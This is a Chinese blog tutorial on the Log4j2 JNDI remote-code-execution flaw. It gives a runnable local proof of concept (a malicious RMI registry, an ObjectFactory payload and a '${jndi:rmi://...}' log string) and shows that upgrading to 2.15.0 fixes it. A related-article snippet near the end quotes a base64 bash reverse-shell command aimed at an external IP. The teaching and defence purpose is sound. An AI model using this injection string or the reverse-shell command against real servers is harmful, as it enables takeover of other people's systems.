Log4j2漏洞详解

最新推荐文章于 2025-05-10 07:41:48 发布
最新推荐文章于 2025-05-10 07:41:48 发布
阅读量6k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Java 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lwllai/article/details/121884436
本文详细介绍了Log4j2的JDNI漏洞,如何通过该漏洞进行远程注入攻击服务,以及Log4j2发布2.15.0版本修复此问题的过程。通过实例演示了漏洞利用的步骤,强调了更新到最新版本以防止攻击的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

周五本应该是个开心的日子,但是12月10日这一天却开心不起来。我想每个程序员都收到了log4j2告警推送了,不得不紧急处理。

以下主要就是来解释下JDNI怎么通过log4j2远程注入攻击我们服务呢?当天晚上log4j2也紧急上线了2.15.0版本修复了此漏洞。

1 引入log4j2依赖包 

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-demo</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <log4.version>2.14.0</log4.version>
    </properties>


    <dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>${log4.version}</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>${log4.version}</version>
        </dependency>
    </dependencies>


</project>
package com.lwl;


import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {

    private static final Logger logger= LogManager.getLogger();


    public static void main(String[] args) {

        String userName= "李商隐";

        logger.info("这是我们的服务,你好:{}",userName);
    }
}

上面这段代码肯定是大家最熟悉不过了,输出大达也知道:这是我们的服务,你好:李商隐

但是再看下下面的代码

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {

    private static final Logger logger= LogManager.getLogger();

    public static void main(String[] args) {
        //String userName= "李商隐";
        String userName= "${java:os}";
        logger.info("这是我们的服务,你好:{}",userName);
    }
}

输出的结果却是:这是我们的服务,你好:Windows 10 10.0, architecture: amd64-64

而不是? 这是我们的服务,你好:${java:os}  这是为什么呢?

2 接着我们打开阿帕奇 log4j2网站查看

 

 上面的文档只好对应了刚刚输入的  java:os

3 下面是此次JDNI攻击

 log4j2遇到了${}都会根据所属的指令去执行相应的处理。

下面我们准备一个服务

3.1 一个简单的输出类

package com.lwl.remote;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class ConsoleDTO implements ObjectFactory {

    static {
        System.out.println("你已经被攻击了");
    }

    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

3.2 利用LocateRegistry注册一个简单地服务

package com.lwl.remote;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RemoteService {

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

            System.out.println("create rmi registry on port 1099");
            Reference reference = new Reference("com.lwl.remote.ConsoleDTO","com.lwl.remote.ConsoleDTO","com.lwl.remote.ConsoleDTO");
            ReferenceWrapper referenceWrapper =new ReferenceWrapper(reference);
            registry.bind("evil",referenceWrapper);
        }catch (Exception e){
            e.printStackTrace();
        }
    }

}

3.3 修改日志打印类的userName

package com.lwl;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {

    private static final Logger logger= LogManager.getLogger();

    public static void main(String[] args) {

        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        String userName= "${jndi:rmi://127.0.0.1:1099/evil}";

        logger.info("这是我们的服务,你好:{}",userName);
    }
}

最终我们来查看结果

你已经被攻击了
[11:18:21:946] [INFO] - com.lwl.Log4jTest.main(Log4jTest.java:21) - 这是我们的服务,你好:${jndi:rmi://127.0.0.1:1099/evil}

Process finished with exit code 0

最终执行的服务代码在输出日志的同时执行了我们在输入框注入的代码:你已经背攻击了。

目前log4j2已经上传了最新的包2.15.0 将pom文件引入最新的版本。

再次执行结果将会只有

[11:23:29:958] [INFO] - com.lwl.Log4jTest.main(Log4jTest.java:21) - 这是我们的服务,你好:${jndi:rmi://127.0.0.1:1099/evil}

Process finished with exit code 0

Log4j2 远程代码执行漏洞(CVE-2021-44228)
qq_68163788的博客
06-18 1611
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228是Log4j2中存在的一个严重的远程代码执行漏洞攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
Apache Log4j2 漏洞详谈
infosec的博客
12-16 5954
源于Apache Log4j2这个漏洞的描述很多,也有很多的解法。开这个博的目的就是想分析一下漏洞具体是如何被利用的,这个大黑锅下面都有哪些坑。 最近由阿里安全团队爆出来的Apache Log4j2漏洞,可以说是霸占了大部分网安人的朋友圈。同时一张热图也被传来传去,就是下面这个图片。 由于Apache Log4j2组件应用的普及性,导致了大部分的应用都受到波及。同时我们也需要知道并不是所有的log功能都是通过Apache Log4j2来实现的,其实我们还有很多选择。众所周知Log4j2是Apache 家的
Log4j2漏洞
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
log4j漏洞复现
最新发布
m0_72199724的博客
05-10 865
Log4j是一个广泛使用的Java日志框架,具有高度灵活性、高效性和可扩展性,适用于调试和监控应用程序。然而,Log4j也暴露了多个安全漏洞,如CVE-2017-5645和CVE-2021-44228。CVE-2017-5645是一个反序列化漏洞攻击者通过发送恶意payload触发代码执行,影响Log4j 2.8.2之前的2.x版本。CVE-2021-44228是一个远程代码执行(RCE)漏洞攻击者利用JNDI协议加载远程恶意脚本,影响Log4j 2.0到2.15.0-rc2版本。漏洞复现表明,攻击者可
log4j2漏洞
thinker
12-12 5360
这个漏洞到底是怎么回事? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事! log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,可以帮助我们了解程序的运行情况,排查程序运行中出现的问题。 在Java技术栈中,用的比较
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1171
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
Apache log4j2漏洞
m0_63645854的博客
06-13 661
本文介绍了log4j2的远程代码执行漏洞
log4j2漏洞检测工具
05-07
**Log4j2漏洞检测工具详解** 在当前的IT环境中,安全问题日益凸显,特别是针对开源组件的安全漏洞Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
《Apache Log4j2漏洞详解及修复指南》 在网络安全领域,Apache Log4j2漏洞是一个备受关注的话题,尤其在2021年底,该漏洞的出现引发了全球范围内的广泛关注。这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java...
windows热补丁Log4j2漏洞缓解工具漏洞java补丁.zip
12-16
《Windows环境下Log4j2漏洞的Java热补丁与缓解工具详解》 在信息技术领域,安全问题始终是不可忽视的重要环节。近年来,Java中的Log4j2漏洞(CVE-2021-44228)引起了广泛关注,它允许远程攻击者通过控制日志输入来...
(vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
m0_62670778的博客
04-27 1380
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1720
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3540
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
Log4j漏洞分析
热门推荐
wbo
12-14 2万+
Log4j漏洞源码分析 这几天Log4j的问题消息满天飞,今天我们就一起来看看从源码角度看看这个漏洞是如何产生的。 大家都知道这次问题主要是由于Log4j中提供的jndi的功能。 具体涉及到的入口类是log4j-core-xxx.jar中的org.apache.logging.log4j.core.lookup.StrSubstitutor这个类。 原因是Log4j提供了Lookups的能力(关于Lookups可以点这里去看官方文档的介绍),简单来说就是变量替换的能力。 在Log4j将要输出的日
log4j2漏洞分析
weixin_47623655的博客
04-11 1446
漏洞标识符为CVE-2021-44228,通常称为Log4Shell或Log4j漏洞,它存在于Log4j的JNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞,向Log4j发送恶意请求,从而触发远程代码执行(RCE)漏洞,进而获得服务器上的完全控制权限。这个漏洞的危害非常大,由于Log4j广泛应用于各种Java应用程序中,这意味着攻击者可以利用该漏洞轻松攻击大量的目标。
log4j2漏洞详解
wanan的博客
01-24 276
log4j2漏洞详解
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1232
CVE-2021-44228
Log4j2 2.15.0版本漏洞修复详解
资源摘要信息:"log4j2 2.15.0漏洞解决" 知识点详细说明: 1. Log4j概述 Apache Log4j 2是一个广泛使用于Java应用程序的日志记录工具。它是由Apache软件基金会开发的,为开发者提供了一种灵活的方式来记录日志信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值